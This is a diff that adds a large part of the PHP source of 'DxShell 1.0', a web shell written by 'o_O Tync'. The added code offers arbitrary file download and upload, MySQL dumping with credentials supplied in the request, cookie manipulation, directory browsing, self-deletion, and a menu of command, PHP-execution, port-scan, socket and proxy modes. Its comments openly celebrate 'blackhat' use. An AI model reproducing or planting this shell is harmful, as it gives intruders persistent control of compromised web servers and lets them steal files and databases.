+		'ed'	=> 'R0lGODlhEAAQAKIAAAAzZv////3Tm8DAwJ7R/Gmd0P///wAAACH5BAEAAAYALAAAAAAQABAAAANDaAYM+lABIVqEs4bArtRc0V3MMDAEMWLACRSp6kRNYcfrw9h3mksvHm7G4sF8RF3Q1kgqmZSKZ/HKSKeN6I/VdGIZCQA7',
+		'downl' => 'R0lGODlhEAAQAJEAADyFFIXQLajcOf///yH5BAEAAAMALAAAAAAQABAAAAI6nAepeY0CI3AHREmNvWLmfXkUiH1clz1CUGoLu0JLwtaxzU5WwK89HxABgESgSFM0fpJHx5DWHCkoBQA7',
+		'gzip'	=> 'R0lGODlhEAAQAKIAAARLsHi+//zZWLJ9DvEZAf///wAAAAAAACH5BAEAAAUALAAAAAAQABAAAANCWLrQDkuMKUC4OMAyiB+Pc0GDYJ7nUFgk6qos56KwJs9m3eLSapc83Q0nnBhDjdGCkcFslgrkEwq9UKHS6dLShCQAADs=',
+		);
+	@ob_clean();
+	if ((!isset($_GET['dximg'])) OR (!in_array($_GET['dximg'], array_keys($IMGS)))) $_GET['dximg']='noone';
+	header('Cache-Control: public');
+	header('Expires: '.Date('r', time()+60*60*24*300));
+	header('Content-type: image/gif');
+	print  base64_decode(   (is_array(($IMGS[$_GET['dximg']])))?$IMGS[$_GET['dximg']][1]:$IMGS[$_GET['dximg']]   );
+	die();
+	}
+
+if ($_GET['dxmode']=='F_DWN')
+	{
+	if (!isset($_GET['dxfile'])) 		die(DxError('No file selected. Check $_GET[\'dxfile\'] var'));
+	if (!file_exists($_GET['dxfile']))  die(DxError('No such file'));
+	if (!is_file($_GET['dxfile'])) 		die(DxError('Hey! Find out how to read a directory in notepad, and u can call me "Lame" =) '));
+
+	$DxDOWNLOAD_File=array(); /* prepare struct */
+	$DxDOWNLOAD_File['filename']=basename($_GET['dxfile']);
+	if (isset($_GET['dxparam']))
+		$DxDOWNLOAD_File['headers'][]=('Content-type: text/plain'); /* usual look thru */
+		else
+		{		$DxDOWNLOAD_File['headers'][]=('Content-type: '.mime_content_type($_GET['dxfile']));
+		$DxDOWNLOAD_File['headers'][]=('Content-disposition: attachment; filename="'.basename($_GET['dxfile']).'";');
+		}
+	$DxDOWNLOAD_File['content']=file_get_contents($_GET['dxfile']);
+	}
+
+if ($_GET['dxmode']=='SQL' AND isset($_POST['dxparam']))
+	{/* download query results */	if (!isset($_GET['dxsql_s'],$_GET['dxsql_l'],$_GET['dxsql_p'],$_GET['dxsql_d'],$_POST['dxsql_q']))
+		die(DxError('Not enough params: $_GET[\'dxsql_s\'],$_GET[\'dxsql_l\'],$_GET[\'dxsql_p\'],$_GET[\'dxsql_d\'],$_POST[\'dxsql_q\'] needed'));
+
+	if ((mysql_connect($_GET['dxsql_s'],$_GET['dxsql_l'],$_GET['dxsql_p'])===FALSE) or (mysql_errno()!=0))
+		die(DxError('No connection to mysql server!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error()));
+	if (!mysql_select_db($_GET['dxsql_d']))
+		die(DxError('Can\'t select database!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error()));
+
+	/* export as csv */
+	$DxDOWNLOAD_File=array(); /* prepare struct */
+	$DxDOWNLOAD_File['filename']='Query_'.$_GET['dxsql_s'].'_'.$_GET['dxsql_d'].'.csv';
+	$DxDOWNLOAD_File['headers'][]=('Content-type: text/comma-separated-values');
+	$DxDOWNLOAD_File['headers'][]=('Content-disposition: attachment; filename="'.$DxDOWNLOAD_File['filename'].'";');
+	$DxDOWNLOAD_File['content']='';
+
+	$_POST['dxsql_q']=explode(';',$_POST['dxsql_q']);
+
+	for ($q=0;$q<count($_POST['dxsql_q']);$q++)
+		{		if (empty($_POST['dxsql_q'][$q])) continue;
+		$num=DxMySQL_FetchResult(DxMySQLQ($_POST['dxsql_q'][$q], false), $DUMP, false);
+		$DxDOWNLOAD_File['content'].="\n\n".'QUERY: '.str_replace(array("\n",";"), array('',"<-COMMA->"), str_replace("\r",'', $_POST['dxsql_q'][$q] )).";";
+		if ($num<=0) {$DxDOWNLOAD_File['content'].="\n".'Empty;'; continue;}
+		foreach ($DUMP[0] as $key => $val) $DxDOWNLOAD_File['content'].=$key.";"; /* headers */
+		for ($l=0;$l<count($DUMP);$l++)
+			{			$DxDOWNLOAD_File['content'].="\n";
+			$INDEXES=array_keys($DUMP[$l]);
+			for ($i=0; $i<count($INDEXES); $i++)
+				$DxDOWNLOAD_File['content'].=str_replace(array("\n",";"), array('',"<-COMMA->"), str_replace("\r",'', $DUMP[$l][ $INDEXES[$i] ])).";";
+
+			}
+		}
+	}
+
+if ($_GET['dxmode']=='SQLD' AND isset($_POST['dxsql_tables']))
+	{	if (!isset($_GET['dxsql_s'],$_GET['dxsql_l'],$_GET['dxsql_p'],$_GET['dxsql_d'],$_POST['dxsql_tables']))
+		die(DxError('Not enough params: $_GET[\'dxsql_s\'],$_GET[\'dxsql_l\'],$_GET[\'dxsql_p\'],$_GET[\'dxsql_d\'],$_POST[\'dxsql_tables\'] needed'));
+
+	if ((mysql_connect($_GET['dxsql_s'],$_GET['dxsql_l'],$_GET['dxsql_p'])===FALSE) or (mysql_errno()!=0))
+		die(DxError('No connection to mysql server!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error()));
+	if (!mysql_select_db($_GET['dxsql_d']))
+		die(DxError('Can\'t select database!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error()));
+
+	if (empty($_POST['dxsql_tables']))  die(DxError('No tables selected...'));
+
+	$DxDOWNLOAD_File=array(); /* prepare struct */
+	$DxDOWNLOAD_File['filename']='Dump_'.$_GET['dxsql_s'].'_'.$_GET['dxsql_d'].'.sql';
+	$DxDOWNLOAD_File['headers'][]=('Content-type: text/plain');
+	$DxDOWNLOAD_File['headers'][]=('Content-disposition: attachment; filename="'.$DxDOWNLOAD_File['filename'].'";');
+	$DxDOWNLOAD_File['content']='';
+
+	$DxDOWNLOAD_File['content'].="\n\t".'/* '.str_repeat('=', 66);
+	$DxDOWNLOAD_File['content'].="\n\t".'==== MySQL Dump '.DxDate(time()).' - DxShell v'.$GLOB['SHELL']['Ver'].' by o_O Tync';
+	$DxDOWNLOAD_File['content'].="\n\t".'==== Server: '.$_GET['dxsql_s'];
+	$DxDOWNLOAD_File['content'].="\n\t".'==== DB: '.$_GET['dxsql_d'];
+	$DxDOWNLOAD_File['content'].="\n\t".'==== Tables: '."\n\t\t\t".implode(', '."\n\t\t\t", $_POST['dxsql_tables']);
+	$DxDOWNLOAD_File['content'].="\n\t".str_repeat('=', 66).' */';
+
+	if (!empty($_POST['dxsql_q']))
+		{		$_POST['dxsql_q']=explode(';', $_POST['dxsql_q']);
+		foreach ($_POST['dxsql_q'] as $CUR)
+			if (empty($CUR)) continue; else DxMySQLQ($CUR, true); /* pre-query */
+		}
+
+	foreach ($_POST['dxsql_tables'] as $CUR_TABLE)
+		{		$DxDOWNLOAD_File['content'].=str_repeat("\n", 5).'/* '.str_repeat('-', 40).' */';
+		DxMySQL_FetchResult(DxMySQLQ('SHOW CREATE TABLE `'.$CUR_TABLE.'`;', false), $DUMP, true);
+		$DxDOWNLOAD_File['content'].="\n".$DUMP[0][1];
+		$DxDOWNLOAD_File['content'].="\n\n";
+		DxMySQL_FetchResult(DxMySQLQ('SELECT * FROM `'.$CUR_TABLE.'`;', false), $DUMP, true);
+		for ($i=0; $i<count($DUMP); $i++)
+			{
+			for ($j=0;$j<count($DUMP[$i]);$j++) $DUMP[$i][$j]=mysql_real_escape_string($DUMP[$i][$j]);
+			$DxDOWNLOAD_File['content'].="\n".'INSERT INTO `'.$CUR_TABLE.'` VALUES ("'.implode('", "', $DUMP[$i]).'");';
+			}
+		}
+	}
+
+if ($_GET['dxmode']=='COOK' AND isset($_POST['dxparam']))
+	{	foreach ($_POST['dxparam'] as $name => $val)
+		{		if ($name=='DXS_NEWCOOK')
+			{
+			if (empty($val['NAM']) or empty($val['VAL'])) continue;			DxSetCookie($val['NAM'], $val['VAL'], time()+60*60*24*10);
+			}
+			else DxSetCookie($name, $val, (empty($val))?1:(time()+60*60*24*10));
+		}
+	DxGotoURL(DxURL('leave', 'dxmode'));
+	die();
+	}
+
+if (isset($_GET['dxinstant']))
+	{	$_GET['dxinstant']=strtoupper($_GET['dxinstant']);
+	if ($_GET['dxinstant']=='DEL')
+		{
+		$ok=@unlink(@substr(@strrchr($_SERVER['PHP_SELF'],"/"),1));
+		print '<script>window.alert("SELF '.(  ($ok)?'deleted. Reload the page to believe me =)':'tried to delete but was unsuccessful'  ).'");</script>';
+		}
+	}
+
+function DxObGZ($s) {return gzencode($s);}
+
+if (isset($DxDOWNLOAD_File))
+	{/* File downloader for everything */
+	if (!$DXGLOBALSHIT)
+		{
+		if ($GLOB['SYS']['GZIP']['CanOutput'])
+			{
+			ini_set('output_buffering',4096);
+			ob_start("DxObGZ");
+			header('Content-Encoding: gzip');
+			}		for ($i=0; $i<count($DxDOWNLOAD_File['headers']); $i++) header($DxDOWNLOAD_File['headers'][$i]);
+		print $DxDOWNLOAD_File['content'];
+		die();
+		}
+	/* if u want to download file when $DXGLOBALSHIT, scroll down */
+	}
+
+###################################################################################
+####################++++++++++++++# M A I N #++++++++++++++++++####################
+###################################################################################
+if (!in_array($_GET['dxmode'], array_keys($GLOB['DxMODES']))) die(DxError('Unknown $_GET[\'dxmode\']! check $GLOB[\'DxMODES\'] array'));
+
+########
+########   Main HAT (blackhat? =))) )
+########
+if (!in_array($_GET['dxmode'], array_keys($GLOB['DxMODES']))) die('Unknown $_GET[\'dxmode\']');
+
+if ($DXGLOBALSHIT)
+	print str_repeat("\n", 20).'<!--SHELL HERE-->';
+?>
+<html><head><title><?=$_SERVER['HTTP_HOST'];?> --= DxShell 1.0 - by o_O Tync =-- :: <?=$GLOB['DxMODES'][$_GET['dxmode']];?></title>
+<Meta Http-equiv="Content-Type" Content="text/html; Charset=windows-1251">
+<link rel="shortcut icon" href="<?=DxURL('kill','dxmode');?>&dxmode=IMG&dximg=DxS">
+<http://leet.phpnet.us/sh.gif>
+<style>
+img	 {border-width:0pt;}
+body, td 		{font-size: 10pt; color: #00B000; background-color: #000000; font-family: Arial;padding:2pt;margin:2pt; vertical-align:top;}
+h1				{font-size: 14pt; color: #00B000; background-color: #002000; font-family: Arial Black; font-weight: bold; text-align: center;}
+h2				{font-size: 12pt; color: #00B000; background-color: #002000; font-family: Courier New; text-align: center;}
+h3				{font-size: 12pt; color: #F0F000; background-color: #002000; font-family: Times New Roman; text-align: center;}
+caption			{font-size: 12pt; color: #00FF00; background-color: #000000; font-family: Times New Roman; text-align:center; border-width: 1pt 3pt 1pt 3pt;border-color:#FFFF00;border-style:solid solid dotted solid;padding: 5pt 0pt;}
+td.h2_oneline	{font-size: 12pt; color: #00B000; font-family: Courier New; text-align: center;background-color: #002000; border-right-color:#00FF00;border-right-width:1pt;border-right-style:solid;vertical-align:middle;}
+td.mode_header	{font-size: 16pt; color: #FFFF00; font-family: Courier New; text-align: center;background-color: #002000; vertical-align:middle;}
+table.outset, td.outset	  {border-width:3pt; border-style:outset; border-color: #004000;margin-top: 2pt;vertical-align:middle;}
+table.bord, td.bord, fieldset   {border-width:1pt; border-style:solid; border-color: #003000;vertical-align:middle;}
+hr   {border-width:1pt; border-style:solid; border-color: #005000; text-align: center; width: 90%;}
+textarea.bout 		{border-color: #000000; border-width:0pt; background: #000000; font: 12px verdana, arial, helvetica, sans-serif; color: #00FF00; Scrollbar-Face-color:#000000;Scrollbar-Track-Color: #000000;}
+td.listing	{background-color: #000500; font-family: Courier New; font-size:8pt; color:#00B000; border-color: #003000;border-width:1pt; border-style:solid; border-collapse:collapse;padding:0pt 3pt;vertical-align:top;}
+td.linelisting  {background-color: #000500; font-family: Courier New; font-size:8pt; color:#00B000; border-color: #003000;border-width:1pt 0pt; border-style:solid; border-collapse:collapse;padding:0pt 3pt;vertical-align:middle;}
+table.linelisting {border-color: #003000;border-width:0pt 1pt; border-style:solid;}
+td.js_floatwin_header {background-color:#003300;font-size:10pt;font-weight:bold;color:#FFFF00;border-color: #00FF00;border-width:1pt; border-style:solid;border-collapse:collapse;}
+td.js_floatwin_body	  {background-color:#000000;font-size:10pt;color:#00B000;border-color: #00FF00;border-width:1pt; border-style:solid;border-collapse:collapse;}
+font.rwx_sticky_bit {color:#FF0000;}
+.highlight_txt		{color: #FFFF00;}
+.achtung			{color: #000000; background-color: #FF0000; font-family: Arial Black; font-size: 14pt; padding:0pt 5pt;}
+
+input 			{font-size: 10pt;font-family: Arial; color: #E0E000; background-color: #000000; border-color:#00FF00 #005000 #005000 #FFFF00; border-width:1pt 1pt 1pt 3pt;border-style:dotted dotted dotted solid; padding-left: 3pt;overflow:hidden;}
+input.radio		{border-width:0pt;color: #FFFF00;}
+input.submit 	{font-size: 12pt;font-family: Impact, Arial Black; color :#00FF00; background-color: #002000; border-color: #00FF00; border-width:0pt 1pt 1pt 0pt; border-style: solid; padding:1pt;letter-spacing:1pt;padding:0pt 2pt;}
+input.bt_Yes 	{font-size: 14pt;font-family: Impact, Arial Black; color :#00FF00; background-color: #005000; border-color: #005000 #005000 #00FF00 #005000; border-width:1pt 1pt 2pt 1pt; border-style: dotted dotted solid dotted; height: 30pt; padding:10pt; margin: 5pt 10pt;}
+input.bt_No 	{font-size: 14pt;font-family: Impact, Arial Black; color :#FF0000; background-color: #500000; border-color: #500000 #500000 #FF0000 #500000; border-width:1pt 1pt 2pt 1pt; border-style: dotted dotted solid dotted; height: 30pt; padding:10pt; margin: 5pt 10pt;}
+input.bt_Yes:Hover 	{color:#000000; background-color:#00FF00;border-bottom-color:#FFFFFF;}
+input.bt_No:Hover 	{color:#000000; background-color:#FF0000;border-bottom-color:#FFFFFF;}
+textarea 		{color:#00FF00; background-color:#001000;border-color:#000000;border-width:0pt;border-style:solid;font-size:10pt;font-family:Arial;Padding:5pt;
+				Scrollbar-Face-Color: #00FF00; Scrollbar-Track-Color: #000500;
+				Scrollbar-Highlight-Color: #00A000;	Scrollbar-3dlight-Color: #00A000; Scrollbar-Shadow-Color: #005000;
+				Scrollbar-Darkshadow-Color: #005000;}
+select			{background-color:#001000;color:#00D000;border-color:#D0D000;border-width:1pt;border-style:solid dotted dotted solid;}
+
+A:Link, A:Visited { color: #00D000;	text-decoration: underline; }
+A.no:Link, A.no:Visited { color: #00D000;	text-decoration: none; }
+A:Hover, A:Visited:Hover , A.no:Hover, A.no:Visited:Hover { color: #00FF00; background-color:#003300; text-decoration: overline; }
+.Hover:Hover {color: #FFFF00; cursor:help;}
+.HoverClick:Hover {color: #FFFF00; cursor:crosshair;}
+span.margin		{margin: 0pt 10pt;}
+td.error {color:#000000; background-color: #FF0000; font-weight: bold; font-size: 11pt;}
+td.warning {color:#000000; background-color: #D00000; font-size: 11pt;}
+font.img_replacer {margin:1pt;padding:1pt;text-decoration: none;border-width:1pt;border-color:#D0D000;border-style:solid;}
+</style>
+
+<?php
+if (in_array($_GET['dxmode'], array('UPL', 'DIR', 'PRT')))
+	{  /* THIS FLOATING WINDOW IS ONLY SET FOR MODES: */?>
+<SCRIPT>
+var dom = document.getElementById?1:0;
+var ie4 = document.all && document.all.item;
+var opera = window.opera; //Opera
+var ie5 = dom && ie4 && !opera;
+var nn4 = document.layers;
+var nn6 = dom && !ie5 && !opera;
+var vers=parseInt(navigator.appVersion);
+var good_browser = (ie5 || ie4);
+function showwin(hdr,txt,w,vis)
+{
+if(good_browser)
+	{
+	var obj =  document.all('js_floatwin');
+	var evnt = event;
+	var xOffset = document.body.scrollLeft;
+	var yOffset = document.body.scrollTop;
+
+	var temp =
+	"<TABLE BORDER=0 CELLSPACING=0 CELLPADDING=0 WIDTH="+ w +">"
+	+((hdr!='')?("<TR><TD class=js_floatwin_header>"+ hdr + "</TD></TR>"):"")
+	+"<TR><TD class=js_floatwin_body>" + txt + "</TD></TR>"
+	+"</TABLE>";
+
+	if (vis == 1)
+		{
+		obj.innerHTML = temp;
+		obj.style.width = w;
+		hor = document.body.scrollWidth - obj.offsetWidth;
+		posHor = xOffset + evnt.clientX + 10;
+		posHor2 = xOffset + evnt.clientX - obj.offsetWidth - 5;
+		posVer = yOffset + evnt.clientY - obj.offsetHeight - 5;
+
+		if (posHor<hor)
+			obj.style.posLeft = posHor
+		else
+			obj.style.posLeft = posHor2;
+
+		obj.style.posTop = posVer;
+
+		obj.style.visibility = "visible";
+		}
+		else
+		{
+		obj.style.visibility = "hidden";
+		obj.style.posTop = 0;
+		obj.style.posLeft = 0;
+		}
+	}
+}
+function movewin()
+{
+if (good_browser)
+	{
+	var obj =  document.all('js_floatwin');
+	var evnt = event;
+	var xOffset = document.body.scrollLeft;
+	var yOffset = document.body.scrollTop;
+
+	hor = document.body.scrollWidth - obj.offsetWidth;
+	posHor = xOffset + evnt.clientX + 10;
+	posHor2 = xOffset + evnt.clientX - obj.offsetWidth - 5;
+	posVer = yOffset + evnt.clientY - obj.offsetHeight - 5;
+
+	if (posHor<hor)
+		obj.style.posLeft = posHor
+		else
+		obj.style.posLeft = posHor2;
+
+	obj.style.posTop = posVer;
+	}
+}
+</SCRIPT>
+<?php } /* /END */?>
+
+</head>
+<body>
+<?php
+if ($DXGLOBALSHIT) /* tries to kill all the fucking bug.php pre-output, if ob_clean() failed */
+	{	print str_repeat("\n", 10).'<!--SHIT KILLER-->';
+	print "\n".'</body></a>'.str_repeat('</table>', 5).str_repeat('</div>', 5).str_repeat('</span>', 5).str_repeat('</pre>', 1).str_repeat('</font>', 5).str_repeat('</script>', 2);
+	print "\n".'<TABLE WIDTH=100% BORDER=0  style="position:absolute;z-index:100;top:0pt;left:0pt;width:100%;height:100%;"><tr><td>';
+	print "\n\n\n\n";
+	}
+?>
+
+<div id="js_floatwin" style="z-index:50;position:absolute;left:0;top:0;visibility:hidden"></div>
+<table width=100% cellspacing=0 cellpadding=0 class=outset>
+<tr>
+	<td width=100pt class=h2_oneline><a href="<?=DxURL('kill', '');?>&dxmode=WTF" class=no><h1>DxShell<br>v<?=$GLOB['SHELL']['Ver'];?></td>
+	<td>
+<?php
+print "\n".'<div style="margin-right:'.(  ((strlen($GLOB['SHELL']['USER']['Login'])+strlen($GLOB['SHELL']['USER']['Passw']))>=2)?'100':'30'  ).'pt;">';
+print "\n".(  ($DXGLOBALSHIT)?'<font color=#FF0000><b>GLOBALSHIT</b></font> ; ':''  );
+print "\n".DxPrint_ParamState('php_ver', 		phpversion()						).' ; ';
+print "\n".DxPrint_ParamState('php_Safe_Mode', 	$GLOB['PHP']['SafeMode'], '!'		).' ; ';
+print "\n".DxPrint_ParamState('magic_quotes', 	(bool)get_magic_quotes_gpc(), '!'	).' ; ';
+print "\n".DxPrint_ParamState('gZip', 			function_exists('gzencode')			).' ; ';
+print "\n".DxPrint_ParamState('cURL', 			function_exists('curl_version')		).' ; ';
+print "\n".DxPrint_ParamState('MySQL', 			function_exists('mysql_connect')	).' ; ';
+print "\n".DxPrint_ParamState('MsSQL', 			function_exists('mssql_connect')	).' ; ';
+print "\n".DxPrint_ParamState('PostgreSQL', 	function_exists('pg_connect')		).' ; ';
+print "\n".DxPrint_ParamState('Oracle', 		function_exists('ocilogon')			).' ; ';
+print "\n".'Disabled functions: '.((($df=@ini_get('disable_functions'))=='')?'<font color=#00FF00><b>NONE</b></font>':'<font color=#FF0000><b>'.str_replace(array(',',';'), ', ', $df).'</b></font>');
+print "\n".'</div>';
+
+print "\n\n".'<span align=right style="position:absolute;z-index:1;right:0pt;top:0pt;"><table><tr><td class="h2_oneline"><nobr>';
+if ((strlen($GLOB['SHELL']['USER']['Login'])+strlen($GLOB['SHELL']['USER']['Passw']))>=2)
+	print "\n".'<a href="'.DxURL('kill', 'dxinstant').'&dxinstant=logoff" title="Log Off" class=no>[Exit]</a>';
+print "\n".'<a href="'.DxURL('kill', 'dxinstant').'&dxinstant=DEL" title="Delete self ('.basename($_SERVER['PHP_SELF']).')" class=no><font color=#FF0000;>'.DxImg('del').'</font></a>';
+print "\n".'</nobr></td></tr></table></span>';
+
+print "\n\n".'<hr>';
+print "\n".'Disk free: <b>'.DxStr_FmtFileSize(disk_free_space($GLOB['FILES']['CurDIR'])).' / '.DxStr_FmtFileSize(disk_total_space($GLOB['FILES']['CurDIR'])).'</b> ; ';
+print "\n".'OS: <b>'.$GLOB['SYS']['OS']['id'].' ('.$GLOB['SYS']['OS']['Full'].' )</b> ; ';
+print "\n".'Yer_IP: <b>'.@$_SERVER['REMOTE_ADDR'].' ('.@$_SERVER['REMOTE_HOST'].')</b> ; ';
+print "\n".'<nobr>Own/U/G/Pid/Inode:<wbr><b>'.get_current_user().' / '.getmyuid().' / '.getmygid().' / '.getmypid().' / '.getmyinode().'</b> ; </nobr>';
+print "\n".'MySQL : <b>'.@mysql_get_server_info().'</b> ; ';
+print "\n".'<br>'.@$_SERVER['SERVER_SOFTWARE'];
+?>
+	</td>
+</table>
+<table width=100% cellspacing=0 cellpadding=0 class=outset>
+<tr>
+	<td width=100pt class=h2_oneline><h2>Modes</td>
+	<td style="text-align:center;"><nobr>
+	<a href="<?=DxURL('kill', '');?>&dxmode=DIR">DIR</a> |
+	<a href="<?=DxURL('kill', '');?>&dxmode=F_VIEW">VIEW</a> |
+	<a href="<?=DxURL('kill', '');?>&dxmode=FTP<?=((!empty($_GET['dxdir']))?'&dxdir='.$_GET['dxdir']:'');?>">FTP</a>
+	<td><font class=highlight_txt><big><b>II</td><td style="text-align:center;"><nobr>
+	<a href="<?=DxURL('leave', 'dxsql_s,dxsql_l,dxsql_p,dxsql_d');?>&dxmode=SQL">SQL</a> |
+	<a href="<?=DxURL('kill', '');?>&dxmode=PHP">PHP</a> |
+	<a href="<?=DxURL('kill', '');?>&dxmode=COOK">COOKIE</a> |
+	<a href="<?=DxURL('kill', '');?>&dxmode=CMD">CMD</a>
+	<td><font class=highlight_txt><big><b>II</td><td style="text-align:center;"><nobr>
+	<a href="<?=DxURL('kill', '');?>&dxmode=MAIL">MAIL</a> |
+	<a href="<?=DxURL('kill', '');?>&dxmode=STR">STR</a> |
+	<a href="<?=DxURL('kill', '');?>&dxmode=PRT">PORTSCAN</a> |
+	<a href="<?=DxURL('kill', '');?>&dxmode=SOCK">SOCK</a> |
+	<a href="<?=DxURL('kill', '');?>&dxmode=PROX">PROXY</a>
+	</td>
+	</tr>
+</table>
+
+<?php $DX_Header_drawn=true; ?>
+
+<?php
+#################################################
+########
+########   DXGLOBALSHIT DOWNLOADER
+########
+if (isset($DxDOWNLOAD_File)) /* only when DXGLOBALSHIT is enabled */
+	{	print "\n".'<table align=center><tr><td class=mode_header><b>Download file</td></tr></table>';
+	print "\n".'The fact you see this means that "'.basename($_SERVER['PHP_SELF']).'" has fucked up the output with it\'s shit, so no headerz could be sent =((';
+	print "\n".'<br>Exclusively, DxShell is proud to present an additional way to download files...Just execute the php-script given below, and it will make the file u\'re trying to download';
+
+	if ($GLOB['SYS']['GZIP']['CanUse'])  $DxDOWNLOAD_File['content']=gzcompress($DxDOWNLOAD_File['content'], 6);
+
+	print "\n\n".'<br><br>';
+	print "\n".'<textarea rows=30 style="width:90%" align=center>';
+	print "\n".'<?php'."\n".' //Execute this, and you\'ll get the requested "'.$DxDOWNLOAD_File['filename'].'" in the same folder with the script ;)';
+	print "\n".'// The file is '.(  ($GLOB['SYS']['GZIP']['CanUse'])?'gzcompress()ed and':''  ).' base64_encode()ed';
+	print "\n\n".'$encoded_file=\''.base64_encode($DxDOWNLOAD_File['content']).'\';';
+	print "\n\n\n\n";
+	print "\n".'$f=fopen(\''.$DxDOWNLOAD_File['filename'].'\', \'w\');';
+	print "\n".'fputs($f, '.(  ($GLOB['SYS']['GZIP']['CanUse'])?'gzuncompress(base64_decode($encoded_file))':'base64_decode($encoded_file)'  ).');';
+	print "\n".'fclose($f);';
+	print "\n".'//Yahoo, hacker, the file is here =)';
+	print "\n".'?>';
+	print "\n".'</textarea>';
+	die();
+	}
+
+?>
+
+<table align=center>
+	<tr><td class=mode_header>
+	@MODE: <b><?=$GLOB['DxMODES'][$_GET['dxmode']];?>
+	</td></tr></table>
+<?
+
+########
+########   AboutBox
+########
+if ($_GET['dxmode']=='WTF')
+	{
+	?>
+<table align=center class=nooooneblya><tr><td><div align=center>
+<?php
+print '<a href="http://hellknights.void.ru/">'.DxImg('exec').'</a>';
+print '<br>o_O Tync, ICQ# 244-648';
+?><br><br>
+<textarea name="LolBox" class=bout style="width:500pt; height:500pt;"></textarea></table>
+<SCRIPT language=Javascript><!--
+var tl=new Array(
+"Kilobytes of c0de, litres of beer, kilometers of cigarettes (*no drugs*), and for what purpose?",
+"What's wrong with other shells?",
+"Usability, functionality, bugs?... NO.",
+"The main bug is: these shells ARE NOT mine =)",
+"Just like to be responsible for every motherfucking byte of code.",
+"Enjoy!",
+"-----------------------------------",
+"o_O Tync, http://hellknights.void.ru/, ICQ#244648",
+"DxShell v<?=$GLOB['SHELL']['Ver'].', date '.$GLOB['SHELL']['Date'];?>",
+"",
+"Greetz to: ",
+"iNfantry the Ruler",
+"Nik8 the Hekker",
+"_1nf3ct0r_ the Father",
+"Industry of Death the betatest0r =)",
+"",
+"Thanks to:",
+"Dunhill the cigarettes, Tuborg the beer, PHP the language, Nescafe the Coffee, Psychedelic the Music",
+"",
+"Wartime testers & debuggers ::: =))) :::",
+"MINDGROW",
+"",
+"",
+"Hekk da pl0net!",
+"--- EOF ---"
+);
+var speed=40;var index=0; text_pos=0;var str_length=tl[0].length;var contents, row;
+function type_text()
+{contents='';row=Math.max(0,index-50);
+while(row<index) contents += tl[row++] + '\r\n';
+document.getElementById("LolBox").value = contents + tl[index].substring(0,text_pos)+'|';
+if(text_pos++==str_length)
+	{text_pos=0;index++;
+	if(index!=tl.length)
+	{str_length=tl[index].length;setTimeout("type_text()",1000);
+	}
+	} else setTimeout("type_text()",speed);
+}type_text();
+//-->
+</SCRIPT>
+	<?php
+	}
+
+
+		###################################
+
+########
+########   Upload file
+########
+if ($_GET['dxmode']=='UPL')
+	{
+	if (empty($_POST['dxdir']) AND empty($_GET['dxdir'])) die(DxError('Uploading without selecting directory $_POST/$_GET[\'dxdir\'] is restricted'));
+
+	if (isset($_FILES['dx_uplfile']['tmp_name']))
+		{
+		$GETFILE=file_get_contents($_FILES['dx_uplfile']['tmp_name']);
+		DxFiles_UploadHere($_POST['DxFTP_FileTO'], $_FILES['dx_uplfile']['name'], $GETFILE);
+		}
+		else
+		{
+		print "\n".'<form action="'.DxURL('leave','dxmode,dxsimple').'" enctype="multipart/form-data" method=POST>';
+		print "\n".'<input type="hidden" name="MAX_FILE_SIZE" value="'.$GLOB['PHP']['upload_max_filesize'].'">';
+		print "\n".'<font class="highlight_txt">Max: '.DxStr_FmtFileSize($GLOB['PHP']['upload_max_filesize']).'</font>';
+		print "\n".'<br><input type=text name="dxdir" value="'.$_GET['dxdir'].'" SIZE=50>';
+		print "\n".'<br><input type=file name="dx_uplfile" SIZE=50>';
+		print "\n".'<input type=submit value="Upload" class="submit"></form>';
+		}
+	}
+
+		###################################
+
+########
+########   Directory listings
+########
+if ($_GET['dxmode']=='DIR')
+	{
+	if (empty($_GET['dxdir'])) $_GET['dxdir']=realpath($GLOB['FILES']['CurDIR']);
+	$_GET['dxdir']=DxFileOkaySlashes($_GET['dxdir']);
+	if (substr($_GET['dxdir'], -1,1)!='/') $_GET['dxdir'].='/';
+
+	print "\n".'<br><form action="'.DxURL('kill', '').'" method=GET style="display:inline;">';
+	DxGETinForm('leave', 'dxmode');
+	print "\n".'<input type=text name="dxdir" value="'.DxFileOkaySlashes(realpath($_GET['dxdir'])).'" SIZE=40>';
+	print "\n".'<input type=submit value="Goto" class="submit"></form>';
+
+	print "\n".'<br>'.'<b>&gt;&gt; <b>'.$_GET['dxdir'].'</b>';
+	if (!file_exists($_GET['dxdir'])) die(DxError('No such directory'));
+	if (!is_dir($_GET['dxdir'])) 	  die(DxError('It\'s a file!! What do you think about listing files in a file? =)) '));
+
+	if (isset($_GET['dxparam']))
+		{		if ($_GET['dxparam']=='mkDIR')  if (	!mkdir($_GET['dxdir'].'__DxS_NEWDIR__'.DxRandomChars(3))	) DxError('Unable to mkDir. Perms?');
+		if ($_GET['dxparam']=='mkFILE') if (	!touch($_GET['dxdir'].'__DxS_NEWDIR__'.DxRandomChars(3))	) DxError('Unable to mkFile. Perms?');
+		}
+
+	if (!($dir_ptr=opendir($_GET['dxdir']))) die(DxError('Unable to open dir for reading. Perms?...'));
+	$FILES=array('DIRS' => array(), 'FILES' => array());
+	while (!is_bool( $file = readdir($dir_ptr)  ) )
+		if (($file!='.') and ($file!='..'))		if (is_dir($_GET['dxdir'].$file)) $FILES['DIRS'][]=$file; else $FILES['FILES'][]=$file;
+	asort($FILES['DIRS']);asort($FILES['FILES']);
+
+	print "\n".'<span style="position:absolute;right:0pt;">';
+	if (isset($_GET['dxdirsimple']))	print '<a href="'.DxURL('kill', 'dxdirsimple').'">[Switch to FULL]</a>';
+		else					print '<a href="'.DxURL('leave', '').'&dxdirsimple=1">[Switch to LITE]</a>';
+	print '</span>';
+
+	$folderup_link=explode('/',$_GET['dxdir'].'../');
+	if (!empty($folderup_link[   count($folderup_link)-3   ]) AND ($folderup_link[   count($folderup_link)-3   ]!='..'))
+		unset($folderup_link[   count($folderup_link)-3   ], $folderup_link[   count($folderup_link)-1   ]);
+	$folderup_link=implode('/', $folderup_link);
+	print "\n".str_repeat('&nbsp;',3).'<a href="'.DxURL('leave', 'dxdirsimple').'&dxmode=DIR&dxdir='.$folderup_link.'" class=no>'
+						.DxImg('foldup').' ../</a>';
+
+	print "\n".str_repeat('&nbsp;', 15).'<font class=highlight_txt>MAKE: </font>'
